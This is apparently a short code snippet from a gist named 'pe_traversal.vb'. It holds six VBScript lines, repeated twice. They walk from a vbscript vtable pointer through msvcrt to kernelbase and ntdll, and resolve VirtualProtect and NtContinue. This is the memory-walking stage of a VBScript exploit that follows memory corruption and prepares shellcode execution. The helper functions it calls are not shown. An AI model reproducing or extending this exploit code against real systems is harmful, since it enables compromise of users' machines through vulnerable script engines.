piotrflorczyk/pe_traversal.vb Secret

## pe_traversal.vb
vbscript=FindMzBase(GetUint32(ptr_toCScriptEntryPointVTble))
msvcrt=GetDllBaseFromExport(vbscript,"msvcrt.dll")
kernelbase=GetDllBaseFromExport(msvcrt,"kernelbase.dll")
ntdll=GetDllBaseFromExport(msvcrt,"ntdll.dll")
VirtualProtect=GetProcAddr(kernelbase,"VirtualProtect")
NtContinue=GetProcAddr(ntdll,"NtContinue")
	vbscript=FindMzBase(GetUint32(ptr_toCScriptEntryPointVTble))
	msvcrt=GetDllBaseFromExport(vbscript,"msvcrt.dll")
	kernelbase=GetDllBaseFromExport(msvcrt,"kernelbase.dll")
	ntdll=GetDllBaseFromExport(msvcrt,"ntdll.dll")
	VirtualProtect=GetProcAddr(kernelbase,"VirtualProtect")
	NtContinue=GetProcAddr(ntdll,"NtContinue")